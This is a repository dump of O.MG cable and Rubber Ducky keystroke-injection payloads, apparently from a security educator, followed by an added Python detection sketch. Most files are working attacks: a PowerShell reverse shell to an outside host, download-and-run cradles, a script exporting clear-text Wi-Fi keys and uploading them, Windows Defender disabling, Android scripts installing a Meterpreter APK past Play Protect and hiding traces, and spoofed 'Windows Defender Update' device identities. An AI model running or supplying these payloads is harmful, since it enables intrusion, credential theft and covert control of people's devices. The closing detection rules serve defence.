├── LICENSE
├── SimpleHTTPPutServer
├── Start ncat
├── o.mg script 1: notepad
├── o.mg script 2: open web browser
├── o.mg script 3: backdoor
├── o.mg script 4: copy wifi details
├── omg_android9SGS8_meterpreter
├── omg_androidS22Ultra.txt
├── omg_android_phone_call
├── omg_android_rickroll
├── omg_android_take_photos
├── omg_apple_macos_login_and_rickroll
├── omg_ios_rickroll
├── omg_linux_login_and_rickroll
├── payload.ps1
├── rubber ducky reverse shell
└── turn off windows defender with powershell


/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2020 davidbombal

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/SimpleHTTPPutServer:
--------------------------------------------------------------------------------
# Use this command to start the server on port 80: sudo python SimpleHTTPPutServer 80

import SimpleHTTPServer
import BaseHTTPServer

class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_PUT(self):
        print self.headers
        length = int(self.headers["Content-Length"])
        path = self.translate_path(self.path)
        with open(path, "wb") as dst:
            dst.write(self.rfile.read(length))


if __name__ == '__main__':
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)

--------------------------------------------------------------------------------
/Start ncat:
--------------------------------------------------------------------------------
#Use this command to start ncat on port 4444:

nc -lp 4444

--------------------------------------------------------------------------------
/o.mg script 1: notepad:
--------------------------------------------------------------------------------
REM Script 1:
REM =========
REM ~~ | Open Notepad and write something:
DELAY 1000
GUI r
DELAY 100
STRING notepad.exe
ENTER
DELAY 1000
STRING You have been hacked

--------------------------------------------------------------------------------
/o.mg script 2: open web browser:
--------------------------------------------------------------------------------
REM Script 2:
REM =========
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc.
STRING chrome
ENTER
DELAY 4000
REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox)
ALT d
REM ~~ | Change line below to desired URL
STRING https://youtu.be/QHwPaLChvgw
ENTER
REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen.
F11

--------------------------------------------------------------------------------
/o.mg script 3: backdoor:
--------------------------------------------------------------------------------
REM Script 3:
REM =========
DELAY 1000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://theboss.lol/payload.ps1');"
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/o.mg script 4: copy wifi details:
--------------------------------------------------------------------------------
REM =========
REM Script 4:
REM =========
REM | Win-Get_SSID_Info-HTTP
REM |
REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up,
REM | then upload them to some public HTTP server via PUT.
REM |
REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines.
REM |
REM | See all "REM ~~" tilde lines below for code that needs to be modified!
REM |
REM | Based on ideas from dantedmc4 / Dante Sparda
REM | https://github.com/dantedmc4/poundplay
REM |
REM | Written by JeffTadashi
REM | https://github.com/JeffTadashi/omducky/
REM |
VID 045E
PID 0048
MAN Microsoft
PRO Windows Defender Update
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM | Export wlan profiles into xml files (including clear-text PSK's) into current directory
STRING netsh wlan export profile key=clear
ENTER
REM | Collect all xml files into a single zip file
STRING Compress-Archive -U -Path .\*.xml -DestinationPath temp.zip
ENTER
DELAY 3000
STRING Invoke-Restmethod -Uri http://theboss.lol/temp.zip -Method Put -Infile .\temp.zip
ENTER
DELAY 2000
REM | File cleanup and exit...
STRING rm .\temp.zip
ENTER
STRING rm .\*.xml
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/omg_android9SGS8_meterpreter:
--------------------------------------------------------------------------------
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android.
REM # You may need to change the script for your particular phone
REM # model and Android version. Play around with it. Delays are very
REM # important and make a really big difference.
REM #
REM # Author: David Bombal
REM # Target: Android 9 (Samsung Galaxy S8+)
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------

REM # -----------------------------------------------------------
REM # clear screen (Not needed, but helps for demos)
REM # -----------------------------------------------------------

GUI ENTER
DELAY 1000
GUI ENTER

REM # -----------------------------------------------------------
REM # launch browser and download apk
REM # -----------------------------------------------------------

GUI b
DELAY 1000
CTRL l
DELAY 50
STRING http://xxx.xxx.xxx.xxx:8000/omg.apk
ENTER
DELAY 4000

REM # -----------------------------------------------------------
REM # open apk with My Files
REM # -----------------------------------------------------------

GUI r
DELAY 500
ENTER
DELAY 500
TAB
TAB
DELAY 500
ENTER
DELAY 1000
CTRL f
DOWN
DOWN
ENTER
TAB
ENTER
DELAY 2000

REM # -----------------------------------------------------------
REM # Do you want to install MainActivity
REM # -----------------------------------------------------------

DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
TAB
RIGHT
ENTER

REM # -----------------------------------------------------------
REM # Blocked by Play Protect. Install anyway.
REM # -----------------------------------------------------------

DELAY 5000
DOWN
LEFT
ENTER

REM # -----------------------------------------------------------
REM # Open application, after installation.
REM # -----------------------------------------------------------

DELAY 10000
DOWN
CTRL f
TAB
ENTER
ENTER

# REM Credit goes to _MG_, and DrewSec for the Android 11 and 12 versions which inspired this.

--------------------------------------------------------------------------------
/omg_androidS22Ultra.txt:
--------------------------------------------------------------------------------
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android.
REM # You may need to change the script for your particular phone
REM # model and Android version. Play around with it. Delays are very
REM # important and make a really big difference.
REM #
REM # Author: David Bombal
REM # Target: Android 12 (Samsung Galaxy S22 Ultra)
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------

REM # -----------------------------------------------------------
REM # clear screen (Not needed, but helps for demos)
REM # -----------------------------------------------------------

GUI ENTER
DELAY 1000
GUI ENTER

REM # -----------------------------------------------------------
REM # launch browser and download apk
REM # -----------------------------------------------------------

GUI b
DELAY 1000
CTRL l
STRING http://xx.xx.xx.xx:8000/omg.apk
ENTER
DELAY 4000
ENTER
DELAY 2000

REM # -----------------------------------------------------------
REM # open apk with My Files
REM # -----------------------------------------------------------

GUI r
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100
ENTER
DELAY 100
TAB
DELAY 100
ENTER

REM # -----------------------------------------------------------
REM # blocked by Play Protect
REM # -----------------------------------------------------------
DELAY 100
TAB
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
ENTER

REM # -----------------------------------------------------------
REM # Run App
REM # -----------------------------------------------------------

DELAY 8000
ENTER

REM # -----------------------------------------------------------
REM # Give Access to All
REM # -----------------------------------------------------------

DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
TAB
ENTER

REM # -----------------------------------------------------------
REM # clear screen (So they can't see we were on their phone)
REM # -----------------------------------------------------------

GUI ENTER
DELAY 1000
GUI ENTER

--------------------------------------------------------------------------------
/omg_android_phone_call:
--------------------------------------------------------------------------------
TAB
DELAY 250
GUI c
DELAY 500
CTRL f
DELAY 250
STRING 123
DELAY 500
ENTER
DELAY 250
TAB
ENTER
DELAY 250
TAB
TAB
LEFT
ENTER

REM Change 123 to the number you want to call
REM You use at your own risk
REM May not work, and may require work

--------------------------------------------------------------------------------
/omg_android_rickroll:
--------------------------------------------------------------------------------
TAB
DELAY 250
GUI b
DELAY 250
CTRL SHIFT n
DELAY 500
CTRL l
DELAY 1000
STRING https://youtu.be/dQw4w9WgXcQ
ENTER

REM Credit for this script goes to MG: https://twitter.com/_mg_

--------------------------------------------------------------------------------
/omg_android_take_photos:
--------------------------------------------------------------------------------
TAB
DELAY 250
GUI f
DELAY 350
CTRL l
LEFT
STRING camera
DELAY 300
ENTER
ENTER
DELAY 300
ENTER
ENTER
DELAY 300
ENTER
ENTER
DOWN
ENTER
DOWN
ENTER

REM You use at your own risk
REM May not work, and may require work

--------------------------------------------------------------------------------
/omg_apple_macos_login_and_rickroll:
--------------------------------------------------------------------------------
VID 05AC
PID 0263
UPARROW
DELAY 2000
STRING SecretPassword
ENTER
DELAY 2000
GUI SPACE
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
DELAY 1000
ENTER
ENTER
TAB
ENTER

REM Credit for this script goes to MG: https://twitter.com/_mg_

--------------------------------------------------------------------------------
/omg_ios_rickroll:
--------------------------------------------------------------------------------
GUI SPACE
DELETE
DELAY 100
STRING safari
ENTER
DELAY 500
GUI l
DELAY 100
STRING https://youtu.be/dQw4w9WgXcQ
DELAY 100
ENTER
ESC

REM Credit for this script goes to MG: https://twitter.com/_mg_

--------------------------------------------------------------------------------
/omg_linux_login_and_rickroll:
--------------------------------------------------------------------------------
VID 05AC
PID 0263
UPARROW
DELAY 2000
ENTER
DELAY 2000
STRING SecretPassword
ENTER
DELAY 5000
ALT F2
DELAY 50
STRING firefox
DELAY 50
ENTER
DELAY 2000
STRING https://www.youtube.com/watch?v=dQw4w9WgXc
ENTER
ENTER
TAB
ENTER
DELAY 2000
F

REM I would not have been able to create this script without MG's help. Thanks MG! https://twitter.com/_mg_

--------------------------------------------------------------------------------
/payload.ps1:
--------------------------------------------------------------------------------
#Change the domain name theboss.lol to your domain name and the port number 4444 to the port number ncat is listening to

$sm=(New-Object Net.Sockets.TCPClient('theboss.lol',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

--------------------------------------------------------------------------------
/rubber ducky reverse shell:
--------------------------------------------------------------------------------
REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://theboss.lol/payload.ps1');"
ENTER
STRING exit
ENTER

--------------------------------------------------------------------------------
/turn off windows defender with powershell:
--------------------------------------------------------------------------------
REM Turn off Windows Defender
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y

--------------------------------------------------------------------------------
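
Detection sketch for the command strings these payloads type, as an added example that is not part of the repository: it scans process command lines (for example Sysmon Event ID 1) and PowerShell script block text (Event ID 4104) and flags Defender tampering followed shortly by a download cradle on the same host. The rule names, the `match_rules` and `triage` functions, the host names and the sample events are constructed for illustration.

```python
import re

# Patterns drawn from the command strings the payload files type. Parameter names
# are matched as prefixes because PowerShell accepts abbreviated parameters
# (the scripts use -DisableRea and -w hidden rather than the full names).
RULES = [
    ("defender_realtime_off", re.compile(r"Set-MpPreference\b.*-DisableRea[a-z]*\s+(\$true|1)\b", re.I)),
    ("download_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b.*\bNet\.WebClient\b.*\.DownloadString\(", re.I)),
    ("wifi_key_export", re.compile(r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b", re.I)),
    ("http_put_upload", re.compile(r"\bInvoke-RestMethod\b(?=.*-Method\s+Put\b)(?=.*-InFile\b)", re.I)),
    ("hidden_window", re.compile(r"\bpowershell(\.exe)?\b.*\s-w[a-z]*\s+hidden\b", re.I)),
]

# Constructed sample records: (epoch seconds, host, command line or script block text).
# Cmdlets typed into an already open PowerShell window (Invoke-RestMethod here) never
# appear as a process command line, so that record stands for script block logging.
SAMPLE = [
    (100, "ws-01", "powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs"),
    (103, "ws-01", "powershell -w hidden \"IEX (New-Object Net.WebClient).DownloadString('http://host.example/p.ps1');\""),
    (200, "ws-02", "netsh wlan export profile key=clear"),
    (204, "ws-02", r"Invoke-RestMethod -Uri http://host.example/temp.zip -Method Put -InFile .\temp.zip"),
    (300, "ws-03", "powershell -NoProfile -Command Get-MpPreference"),
    (310, "ws-03", "netsh wlan show profiles"),
]

def match_rules(text):
    """Return the names of all rules matching one command line or script block."""
    return [name for name, rx in RULES if rx.search(text)]

def triage(events, window_s=60):
    """Return (hits, chained): per-event rule hits, and the hosts where Defender
    tampering is followed by a download cradle within window_s seconds."""
    hits, last_tamper, chained = [], {}, set()
    for ts, host, text in sorted(events):
        names = match_rules(text)
        if names:
            hits.append((ts, host, names))
        if "defender_realtime_off" in names:
            last_tamper[host] = ts
        if "download_cradle" in names and ts - last_tamper.get(host, float("-inf")) <= window_s:
            chained.add(host)
    return hits, chained

if __name__ == "__main__":
    for hit in triage(SAMPLE)[0]:
        print(hit)
```

The scripts that set `VID`, `PID`, `MAN` and `PRO` present a Microsoft keyboard identity to the host, so the USB descriptor alone is not a reliable signal; the typed commands are.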